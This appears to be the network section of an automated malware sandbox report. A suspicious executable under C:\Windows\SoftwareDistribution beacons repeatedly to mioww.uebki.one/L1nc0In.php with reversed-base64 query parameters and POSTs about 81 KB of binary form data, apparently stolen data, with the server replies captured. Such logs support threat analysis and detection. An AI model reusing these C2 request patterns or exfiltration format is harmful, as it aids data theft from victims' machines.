                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.449731188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:11:58.646229982 CEST705OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiIlVGM2MTO4IWZwYmM1MjNlBDMkJzM2EzMjhTNxUmM2cjN1cjNzADO3IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W HTTP/1.1
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:11:59.308053970 CEST615INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:11:59 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OYRJmaMVQ6Wc8wxsXIQ1fqSjFP0w5ikRoaUlfW0e8N1TGr5jHjU91Sfn9Gt4095O3QUPv1VxLkx7UBwFTq2CtMK8siILqNHmkJ%2FBDOKvHNic3ZN9PHN%2FAflambRplzhUmPo%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8d8e2b08c466-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0
                              Aug 31, 2024 10:11:59.313194990 CEST1257OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&ca3c68deb473a887593651d6a340f1bb=0VfiElZpRjMiBnUYRWas12Yw4EWhVkVtNGakhEZtljMVNGexM2M5ckW1xmMWNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiIlVGM2MTO4IWZwYmM1MjNlBDMkJzM2EzMjhTNxUmM2cjN1cjNzADO3IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IW [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:11:59.584100008 CEST633INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:11:59 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BUeoOiJJXQ%2FfqnEUyqi%2BRoyz%2FShgoKI1K6YGnXZxaFuVmPG7GrVjZLKkC%2B6CZjLd0o%2B3Neoeh5Pmj1eMw%2BlOC%2FbJ0wgbzw0%2FmWO%2F%2FBtpQQblyIzF%2FHw7LreTgddbSYhdYLE%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8d900c28c466-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.449732188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:11:59.768696070 CEST708OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&84ccbc5ddc4286bb9be5ede77b20cbca=QX9JSUNJiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5kjZkR2MjJWYlVzYhV2Y0QWZ5M2MyMzYxkTMjBzY2cTNkFTO5QTYxIiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W HTTP/1.1
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:12:00.448710918 CEST617INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:12:00 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wQh%2FYGBu5aYm5lprEsX8u3jxZU%2FzIAOihLXUshhaVkinmMIQdeOuVZiC%2BYz2yfHcjEz9DnR7nP0cyTWR6zMDNwtLeskcuFmXsvthnTGLZHupxdyMk2HaFHRhwki9gX0Xj6g%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8d953f727c87-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.449733188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:12:00.463371038 CEST512OUTPOST /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryLi196lcbgF3BNosl
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                              Host: mioww.uebki.one
                              Content-Length: 81424
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 31, 2024 10:12:00.821901083 CEST12360OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 4c 69 31 39 36 6c 63 62 67 46 33 42 4e 6f 73 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61
                              Data Ascii: ------------WebKitFormBoundaryLi196lcbgF3BNoslContent-Disposition: form-data; name="28d68c3c3fcc342eb999bb72b34f8113"iFjY2IGZkdTY0M2M5EjM1YGZiNDMhZTNhFGZ0QzY0YjZkBjY2YmYx0SNwgTZ1ADMihjZjFTNxQGMxkDZyMDOhlzMiJzY5QWOiFGNycjYhFmM----------
                              Aug 31, 2024 10:12:00.826970100 CEST12360OUTData Raw: ef ad 7a 2f c6 43 a1 8e a8 d6 9b 49 49 1d ca b5 3c fc 46 0d 21 d7 9f c4 ab ba 84 de 30 1a 16 be 4e 7c e4 22 69 61 b7 3c 6b fd fd cc dc cc 20 fd c9 17 52 1c 95 3c b1 cc b3 6b 21 34 22 da 4b b0 b4 65 f1 7d a5 bd 1e 2d 5d 83 a2 c9 d8 ef 46 a9 75 4c
                              Data Ascii: z/CII<F!0N|"ia<k R<k!4"Ke}-]FuLI=CU4*N$CraV,n.&9*=Bid}Z%7C6X#How0n=-0[:-;y32MtTU-;qdoK1L~jy`-gk0g
                              Aug 31, 2024 10:12:00.827084064 CEST4944OUTData Raw: ea 7b e5 d2 27 b5 ab 15 8c 07 6f fb c9 95 6e cd 31 aa 9c ef 77 33 73 ba d8 26 ef 61 31 6a 99 bb dd d0 71 f2 69 10 3c da e9 46 7a eb d1 6d 15 6e 8d db b2 46 22 e9 27 5d 99 bf 16 6b 9e 7f df 32 19 47 99 f4 e6 46 32 86 30 b1 aa 19 76 66 9d fb c2 eb
                              Data Ascii: {'on1w3s&a1jqi<FzmnF"']k2GF20vf kVhr+7Fg#!+#-=yHE:_k/G~8Jya\tw`%Wf~*+:W{2%w$?},gzF"SX4}!4
                              Aug 31, 2024 10:12:00.827182055 CEST4944OUTData Raw: ea f9 27 47 0f 9b b7 6e 02 1e a6 06 86 41 d1 29 6d 87 83 02 23 bb d6 87 f4 4e a7 c0 3e f3 00 89 6a a5 e9 9b b9 38 78 e6 86 8e 70 92 fd fe e0 2f 8b cf a0 a2 16 4f 2d de 8d 9a 08 31 d9 0e 13 c6 62 b0 5e 3b 34 5a c8 a2 72 62 a4 72 f2 b6 b6 1c 51 fe
                              Data Ascii: 'GnA)m#N>j8xp/O-1b^;4ZrbrQCBeO0bB@hD?#z1xa&*fSZ=C^D&4fa1xNhtm3v!FH0R`x+/<^-eJTPtvTr**g
                              Aug 31, 2024 10:12:00.831357956 CEST2472OUTData Raw: a2 a5 3f 45 3c 1e 0a fd 79 4e 25 97 68 f5 a2 4c c6 9d d5 4b ac 87 d8 fe 5b 98 09 30 9c a0 dc cb cd 22 cb 8e 3b 73 57 01 f0 41 96 90 e6 8b 40 da 50 94 b0 e0 67 b3 99 15 b8 1c 46 a2 39 60 a5 06 eb 7d c9 54 22 11 9e 76 49 dc 4e d2 a3 de 21 f5 93 dd
                              Data Ascii: ?E<yN%hLK[0";sWA@PgF9`}T"vIN!)`A5Qn(K_aW%Slsu:jaftO>ntfyt!a@+rn5Vq'}+0~Z &.''t/$B_s*=
                              Aug 31, 2024 10:12:00.832062960 CEST4944OUTData Raw: bf 37 27 79 21 15 a9 ff f5 18 ff 07 18 29 fe 15 87 ff 35 ce 8b d2 40 bc ff be 4b f9 5f 82 14 f6 bf c6 e5 c7 09 16 90 d0 36 92 14 c0 8f de a6 a1 45 0a 7e 47 19 1b 0d c5 93 c7 62 98 a4 de 7a 3e 28 19 02 9a f5 b7 47 90 35 0f 04 8e 4a 47 e9 1a 6d ca
                              Data Ascii: 7'y!)5@K_6E~Gbz>(G5JGmkM.n3t&-}sVEV<13JlTQpys!6BRbXKn^~5'"IcD3s`O<2}n=Y{)lBS
                              Aug 31, 2024 10:12:00.832242966 CEST7416OUTData Raw: 76 6c 2a 4c da b5 b0 59 13 81 7d 87 ba da 2a 82 4d 64 49 6e 0a f2 93 82 91 6f 92 de 61 fb d6 7d 15 27 a7 0f 1b 94 87 c2 23 ea b9 0a 0e cd 52 db 87 92 2d b3 f2 59 d5 b7 9d 08 ca 43 21 f8 27 6d 20 e6 62 5e 5d f2 1c 44 64 a7 b9 4c 1a 6b 90 c9 44 1b
                              Data Ascii: vl*LY}*MdInoa}'#R-YC!'m b^]DdLkDT!pz:0-qpD 7mX)%pI$u<C(lqLvyBl3O>p@tNk=rG}B|%k)/;O*y>MkW'Mk(nP@Czpm;oge]M
                              Aug 31, 2024 10:12:00.833009005 CEST2472OUTData Raw: 90 db 41 ba ee 4d dd 67 8e 66 6e b3 f9 99 2a 88 00 ad 65 d2 fd 08 a9 34 13 3d 1e 87 57 ef 2f 6e dc 10 43 5f be a7 b4 38 94 1b ab d5 7b b5 3a 78 4c ab 63 26 d9 79 df f1 b1 4c 58 bd 94 24 cb 7e d3 fd 05 e6 a0 fa c4 ec 3d af 83 f9 1d e5 33 05 a2 44
                              Data Ascii: AMgfn*e4=W/nC_8{:xLc&yLX$~=3D!U${|/VWBkTT/oMkV&W:Io9#2el[l|e^p?y(-_ecCRZA->z/(WeR*+Y))axm3
                              Aug 31, 2024 10:12:00.836407900 CEST24720OUTData Raw: 76 85 2d 7b 20 df 69 28 35 ea 01 73 b2 05 ab d8 f4 af 85 e8 c6 d7 08 c7 3c 17 48 08 0b 37 0d f3 7e d0 2b c0 de 87 45 8f f3 ca c5 db 0f 62 ea 0b 68 93 84 8a d0 39 cd a7 57 44 98 87 4e 4d 8a 7d 8f 2e 7f 25 86 6a e0 5f a6 76 6f e3 ae a3 bc 2a 55 24
                              Data Ascii: v-{ i(5s<H7~+Ebh9WDNM}.%j_vo*U$wlU{@R*wb&gsfFxFEcwY;$pV|ezt~4>dyp$K4hMc<F}#F*D a5jn{eU
                              Aug 31, 2024 10:12:00.836935043 CEST4792OUTData Raw: af 9e a3 d7 00 2b 14 c0 5a 61 ef 21 f4 99 a7 b4 4d 05 7c dc af a2 7b a3 06 b6 2d a9 b0 b0 88 60 42 70 02 cb d7 10 49 55 5b 27 95 8e 4b f0 af 59 c6 26 35 5c 43 db ab dd e7 75 b6 e9 b8 f7 83 d6 3e 42 ab 43 7a 75 ba 1d 0b d2 e3 e2 b9 22 e0 6f ef 6f
                              Data Ascii: +Za!M|{-`BpIU['KY&5\Cu>BCzu"ookb]:<sp`)Y!`j(qkb53C;88<xTvdJl-0zX2j!.,tZ1l%^K<U]Lz22}hz8a a,n/'mT3^G:,
                              Aug 31, 2024 10:12:00.928589106 CEST25INHTTP/1.1 100 Continue
                              Aug 31, 2024 10:12:01.556022882 CEST619INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:12:01 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WQyuo1va4ENMT%2F5XOFAo4b1OykkD%2BY8vuHi6Ss%2FCBxBKXlUxpSzEvt4HFgz4htyscy6nuSg0gmF0LQtjdgND3sBlcLp46m2HdkqGpi%2FtNfCd9FFFvG9W6JZ5OdlJWtqoMpg%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8d997e4c4379-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.449734188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:12:03.921220064 CEST2107OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:12:04.650789976 CEST723INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:12:04 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SMPPUFyYaymkheWLqTEI4IoitCv1tJ2Cs4clKvBjkYlJ1kNm3Gw5KDps8PH5qtRkctGXOIffqnpfADBTsbno8OcGkabc7%2Fs5LubHi8vx1feI3XcYJyypVMCbfkLI4JDW5EU%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8daf0df97d0b-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              5192.168.2.449735188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:12:09.671117067 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:12:10.393224955 CEST733INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:12:10 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QbQouBR7U9dTTdKOzjTD%2B7LtOhVamfu0jDF2%2FzEA7201FVNEiE1rQUwif89Zedb5VBULoSsujhb0s%2Bl3v70vG%2Fli9X1giKpD1Eptn8j3aGaVNEb%2F5gc0FreNesiaaxtr%2BIs%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8dd2ee370f6f-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              6192.168.2.449742188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:12:15.405662060 CEST2107OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:12:16.159619093 CEST727INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:12:16 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZbgSScnaZN%2F9xWLHJPyfgcpt%2F0CyxUj%2FoLHJT6K8TmNB1bK5SROfmvaLYFvm7L7gNUKmynbD0tFDORwAKEkESZ2UUv4Js01wts4zwISetu2wiRUESGudoh6SPIffcBECH94%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8df6dd448c18-EWR
                              alt-svc: h3=":443"; ma=86400
